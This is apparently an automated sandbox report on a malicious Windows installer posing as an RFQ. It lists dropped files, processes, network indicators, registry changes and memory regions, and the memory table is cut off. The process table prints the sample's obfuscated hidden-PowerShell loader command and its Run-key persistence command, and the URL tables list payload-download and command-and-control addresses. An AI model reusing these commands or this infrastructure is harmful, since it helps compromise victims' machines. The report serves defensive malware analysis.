Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
RFQ-LOTUS 2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Minken.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg
|
ASCII text, with very long lines (60524), with no line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xacbfbf00, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\27-17zLkR9
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Minken.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t1a5bob.t2e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r04wbpr0.oz2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Keeling\Imblaze\Gorget\Cowpuncher.oml
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Optimummet29\Strelsens.Reg135
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\eufomane.mul
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Stewed\manifesterede.pap
|
DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration:
offset 0.000000, slope 33569792.000000
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Tveboplante\Diverged\Syntheme\udelade.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Vejgrfts\Sulfonering228\Travesty\vermenging.bes
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
Chrome Cache Entry: 68
|
ASCII text, with very long lines (9004)
|
downloaded
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
|
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Users\user\AppData\Local\Temp\Minken.exe
|
"C:\Users\user\AppData\Local\Temp\Minken.exe"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ
/d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds%
($Sivsanger)"
|
||
C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe
|
"C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe"
|
||
C:\Windows\SysWOW64\fc.exe
|
"C:\Windows\SysWOW64\fc.exe"
|
||
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle
minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
https://www.google.com/async/newtab_promos
|
142.251.32.100
|
||
http://www.holein1sa.com/gzu1/
|
213.171.195.105
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
http://www.shevgin.top/gzu1/
|
162.0.237.22
|
||
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.bin
|
104.21.31.110
|
||
https://thequirkyartman.co.uk/wp-includes/pLykMdE/ZIbbdBq101.binP
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.cngdesk.com/gzu1/
|
47.243.134.243
|
||
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
142.251.32.100
|
||
http://www.qdzdvrk.shop/gzu1/
|
47.76.136.160
|
||
http://www.wrgardenrooms.co.uk/gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP
|
217.160.0.13
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
http://www.luckydomainz.shop/gzu1/
|
91.195.240.19
|
||
http://www.qdzdvrk.shop/gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP
|
47.76.136.160
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
|
142.251.32.100
|
||
https://thequirkyartman.co.uk/1
|
unknown
|
||
http://www.cngdesk.com/gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP
|
47.243.134.243
|
||
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
http://www.holein1sa.com/gzu1/?7Br4wVx=VT8K0v27N5bGcxCaj+YYD9yKQ06FddJKrderC5Pcma0WiavcK12ZIFD1KaFj6jAJAc5C6yt/FybBtASqq9iUhSi+wlWN91M6kc0r7o/QXgUEGL9jkgBqabg=&Y0H=66WP
|
213.171.195.105
|
||
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
|
142.251.32.100
|
||
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
142.251.32.100
|
||
https://thequirkyartman.co.uk/A
|
unknown
|
||
http://www.luckydomainz.shop/gzu1/?7Br4wVx=KINnc6YGk8HV8ei39HElS4I1DjF/UhmuqXZgjVMGlWHMmd+U6gw6qLbNy3URNR7Ucze4YdZnZ4EfPoI0+cgnC/yXbL3Ii5JH3BdQoxHuvJDFjkEgUbJI9tc=&Y0H=66WP
|
91.195.240.19
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
http://www.shevgin.top/gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP
|
162.0.237.22
|
||
http://www.wrgardenrooms.co.uk/gzu1/
|
217.160.0.13
|
There are 32 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
www.theertyuiergthjk.homes
|
unknown
|
||
www.vegus24.org
|
unknown
|
||
www.golfscorecardus.com
|
unknown
|
||
www.sfebg.com
|
unknown
|
||
www.qdzdvrk.shop
|
unknown
|
||
www.luckydomainz.shop
|
unknown
|
||
www.maerealtysg.com
|
unknown
|
||
www.wrgardenrooms.co.uk
|
217.160.0.13
|
||
thequirkyartman.co.uk
|
104.21.31.110
|
||
www.holein1sa.com
|
213.171.195.105
|
||
www.cngdesk.com
|
47.243.134.243
|
||
vegus24.org
|
3.33.130.190
|
||
parkingpage.namecheap.com
|
91.195.240.19
|
||
www.google.com
|
142.251.32.100
|
||
cjhm.737773.cn
|
47.76.136.160
|
||
www.shevgin.top
|
162.0.237.22
|
There are 6 hidden domains, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
162.0.237.22
|
www.shevgin.top
|
Canada
|
||
217.160.0.13
|
www.wrgardenrooms.co.uk
|
Germany
|
||
192.168.2.16
|
unknown
|
unknown
|
||
192.168.2.4
|
unknown
|
unknown
|
||
91.195.240.19
|
parkingpage.namecheap.com
|
Germany
|
||
239.255.255.250
|
unknown
|
Reserved
|
||
142.251.32.100
|
www.google.com
|
United States
|
||
47.243.134.243
|
www.cngdesk.com
|
United States
|
||
104.21.31.110
|
thequirkyartman.co.uk
|
United States
|
||
3.33.130.190
|
vegus24.org
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
47.76.136.160
|
cjhm.737773.cn
|
United States
|
||
213.171.195.105
|
www.holein1sa.com
|
United Kingdom
|
There are 3 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_CURRENT_USER\Arkitekttegningers
|
Daughterling
|
||
HKEY_CURRENT_USER\Environment
|
Uhelds
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Paraferingen
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
4BE0000
|
unkown
|
page execute and read and write
|
||
B490000
|
direct allocation
|
page execute and read and write
|
||
7C0000
|
trusted library allocation
|
page read and write
|
||
2160000
|
system
|
page execute and read and write
|
||
800000
|
trusted library allocation
|
page read and write
|
||
22E00000
|
unclassified section
|
page execute and read and write
|
||
110000
|
system
|
page execute and read and write
|
||
5D2000
|
heap
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
4CE2000
|
trusted library allocation
|
page read and write
|
||
6A84000
|
system
|
page read and write
|
||
8800000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8930000
|
trusted library allocation
|
page read and write
|
||
249512A0000
|
remote allocation
|
page read and write
|
||
7C1000
|
unkown
|
page read and write
|
||
695000
|
heap
|
page read and write
|
||
648E000
|
trusted library allocation
|
page read and write
|
||
70BC000
|
heap
|
page read and write
|
||
2494BA73000
|
heap
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
788000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7A9000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
21BD000
|
system
|
page execute and read and write
|
||
1B0000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page readonly
|
||
746E5FE000
|
unkown
|
page readonly
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
249512F1000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
66B2000
|
system
|
page read and write
|
||
8B4C000
|
stack
|
page read and write
|
||
70D7000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page execute read
|
||
2140000
|
remote allocation
|
page execute and read and write
|
||
2494C1C0000
|
trusted library section
|
page readonly
|
||
70CE000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
A20000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
87F7000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6DA8000
|
system
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A1FBE000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A1E10000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
528E000
|
stack
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
746E6FE000
|
unkown
|
page readonly
|
||
792E000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
746E3FB000
|
stack
|
page read and write
|
||
22DC9000
|
heap
|
page read and write
|
||
210A0280000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7CDF000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
5343000
|
trusted library allocation
|
page read and write
|
||
70BC000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8840000
|
heap
|
page read and write
|
||
22A70000
|
direct allocation
|
page read and write
|
||
8920000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
65C000
|
heap
|
page read and write
|
||
70D7000
|
heap
|
page read and write
|
||
D290000
|
direct allocation
|
page execute and read and write
|
||
22A60000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
848000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
5A7000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
800000
|
unkown
|
page read and write
|
||
746E57E000
|
stack
|
page read and write
|
||
67C000
|
heap
|
page read and write
|
||
210A1FAC000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7430000
|
direct allocation
|
page read and write
|
||
7C0F000
|
stack
|
page read and write
|
||
731E000
|
stack
|
page read and write
|
||
752E000
|
heap
|
page read and write
|
||
2494C31C000
|
heap
|
page read and write
|
||
22ABE000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
746F47E000
|
stack
|
page read and write
|
||
7B1D000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2295E000
|
stack
|
page read and write
|
||
22C60000
|
heap
|
page read and write
|
||
746EA7E000
|
stack
|
page read and write
|
||
BBC000
|
stack
|
page read and write
|
||
52D0000
|
heap
|
page execute and read and write
|
||
7539000
|
heap
|
page read and write
|
||
5A7000
|
unkown
|
page readonly
|
||
7BBE000
|
heap
|
page read and write
|
||
AFE000
|
stack
|
page read and write
|
||
706E000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4DA8000
|
trusted library allocation
|
page read and write
|
||
8BCC000
|
stack
|
page read and write
|
||
9CF000
|
heap
|
page read and write
|
||
249510E7000
|
heap
|
page read and write
|
||
657000
|
heap
|
page read and write
|
||
ACBE7FE000
|
stack
|
page read and write
|
||
2494BA78000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
7430000
|
heap
|
page execute and read and write
|
||
726E000
|
stack
|
page read and write
|
||
25DF000
|
stack
|
page read and write
|
||
746E7FE000
|
unkown
|
page readonly
|
||
40A000
|
unkown
|
page write copy
|
||
8B8C000
|
stack
|
page read and write
|
||
7119000
|
heap
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
5E8000
|
unkown
|
page execute read
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
7220000
|
heap
|
page read and write
|
||
5EA000
|
unkown
|
page execute read
|
||
24950F10000
|
trusted library allocation
|
page read and write
|
||
24950F15000
|
trusted library allocation
|
page read and write
|
||
5C7000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
77AF000
|
stack
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
ACBD7FE000
|
stack
|
page read and write
|
||
735E000
|
stack
|
page read and write
|
||
51AE000
|
stack
|
page read and write
|
||
22DC0000
|
direct allocation
|
page read and write
|
||
2480000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24950F10000
|
trusted library allocation
|
page read and write
|
||
2494C1F0000
|
trusted library section
|
page readonly
|
||
33A3000
|
heap
|
page read and write
|
||
7450000
|
direct allocation
|
page read and write
|
||
7119000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
43A000
|
stack
|
page read and write
|
||
8C30000
|
heap
|
page read and write
|
||
210A0031000
|
system
|
page execute and read and write
|
||
9690000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2495102C000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22BE0000
|
remote allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
8940000
|
trusted library allocation
|
page read and write
|
||
2460000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22F0000
|
unkown
|
page readonly
|
||
233F1000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
77EE000
|
stack
|
page read and write
|
||
746E0FE000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
7AE7000
|
heap
|
page read and write
|
||
8A85000
|
trusted library allocation
|
page read and write
|
||
42D4000
|
unclassified section
|
page read and write
|
||
647000
|
heap
|
page read and write
|
||
34B0000
|
trusted library section
|
page read and write
|
||
68E000
|
heap
|
page read and write
|
||
73B0000
|
direct allocation
|
page read and write
|
||
2494C302000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951256000
|
trusted library allocation
|
page read and write
|
||
20E0000
|
unkown
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
848000
|
heap
|
page read and write
|
||
752D000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7DF000
|
stack
|
page read and write
|
||
7B12000
|
heap
|
page read and write
|
||
2DCE000
|
direct allocation
|
page execute and read and write
|
||
297F000
|
unkown
|
page read and write
|
||
5D40000
|
remote allocation
|
page execute and read and write
|
||
210A1A60000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
5CA000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
AAA000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24951218000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
7440000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
24950EF0000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
5436000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
249510C4000
|
heap
|
page read and write
|
||
63A000
|
heap
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
711F000
|
heap
|
page read and write
|
||
7450000
|
direct allocation
|
page read and write
|
||
21AD000
|
system
|
page execute and read and write
|
||
73E0000
|
direct allocation
|
page read and write
|
||
746E67E000
|
stack
|
page read and write
|
||
210A1E03000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
249510FB000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7B0D000
|
heap
|
page read and write
|
||
85F000
|
heap
|
page read and write
|
||
24951215000
|
trusted library allocation
|
page read and write
|
||
8C12000
|
heap
|
page read and write
|
||
7C0000
|
trusted library allocation
|
page read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
7AB0000
|
heap
|
page execute and read and write
|
||
24950FE0000
|
trusted library allocation
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
5E2000
|
heap
|
page read and write
|
||
22A50000
|
direct allocation
|
page read and write
|
||
2494C30C000
|
heap
|
page read and write
|
||
24951117000
|
heap
|
page read and write
|
||
6349000
|
trusted library allocation
|
page read and write
|
||
32F6000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
190000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494C31A000
|
heap
|
page read and write
|
||
4CB4000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4E06000
|
unkown
|
page execute and read and write
|
||
210A01B0000
|
heap
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
3396000
|
heap
|
page read and write
|
||
8810000
|
trusted library allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
23E70000
|
unclassified section
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22BE0000
|
remote allocation
|
page read and write
|
||
70CC000
|
system
|
page read and write
|
||
22E00000
|
direct allocation
|
page read and write
|
||
22DC0000
|
direct allocation
|
page read and write
|
||
210A1FC4000
|
trusted library allocation
|
page read and write
|
||
210A1E00000
|
trusted library allocation
|
page read and write
|
||
3E1E000
|
unclassified section
|
page read and write
|
||
8E8E000
|
stack
|
page read and write
|
||
BE90000
|
direct allocation
|
page execute and read and write
|
||
2495111A000
|
heap
|
page read and write
|
||
14D000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
ACBEFFE000
|
stack
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
7C4000
|
unkown
|
page readonly
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
1FF82000
|
system
|
page read and write
|
||
2494C501000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2F98000
|
stack
|
page read and write
|
||
4C90000
|
trusted library section
|
page read and write
|
||
8A2000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
24950F44000
|
trusted library allocation
|
page read and write
|
||
88BD000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
746E97E000
|
stack
|
page read and write
|
||
23115000
|
heap
|
page read and write
|
||
34C8000
|
heap
|
page read and write
|
||
626000
|
unkown
|
page execute read
|
||
6C1000
|
heap
|
page read and write
|
||
2495101F000
|
heap
|
page read and write
|
||
5EC000
|
unkown
|
page execute read
|
||
746DFF9000
|
stack
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
77C000
|
unkown
|
page read and write
|
||
732F000
|
stack
|
page read and write
|
||
85B000
|
unkown
|
page read and write
|
||
B9E000
|
stack
|
page read and write
|
||
7714000
|
system
|
page read and write
|
||
796E000
|
stack
|
page read and write
|
||
24951200000
|
trusted library allocation
|
page read and write
|
||
2F01000
|
direct allocation
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
3359000
|
heap
|
page read and write
|
||
210A028F000
|
heap
|
page read and write
|
||
70DF000
|
heap
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
2299F000
|
stack
|
page read and write
|
||
7350000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2494BA13000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
7440000
|
direct allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A1E16000
|
trusted library allocation
|
page read and write
|
||
8910000
|
trusted library allocation
|
page read and write
|
||
2494C1E0000
|
trusted library section
|
page readonly
|
||
D8000
|
stack
|
page read and write
|
||
E690000
|
direct allocation
|
page execute and read and write
|
||
516C000
|
stack
|
page read and write
|
||
4D8E000
|
stack
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
298E000
|
stack
|
page read and write
|
||
2D5D000
|
direct allocation
|
page execute and read and write
|
||
AA90000
|
direct allocation
|
page execute and read and write
|
||
5F0000
|
unkown
|
page execute read
|
||
338D000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
22840000
|
heap
|
page read and write
|
||
20272000
|
system
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
4C70000
|
heap
|
page read and write
|
||
232BE000
|
direct allocation
|
page execute and read and write
|
||
37E0000
|
unkown
|
page execute and read and write
|
||
249512A3000
|
trusted library allocation
|
page read and write
|
||
23E0000
|
unkown
|
page execute and read and write
|
||
6C1000
|
heap
|
page read and write
|
||
2109FFF0000
|
system
|
page execute and read and write
|
||
24950E80000
|
trusted library allocation
|
page read and write
|
||
6475000
|
trusted library allocation
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
210A02B1000
|
heap
|
page read and write
|
||
6C1000
|
heap
|
page read and write
|
||
69B000
|
heap
|
page read and write
|
||
2150000
|
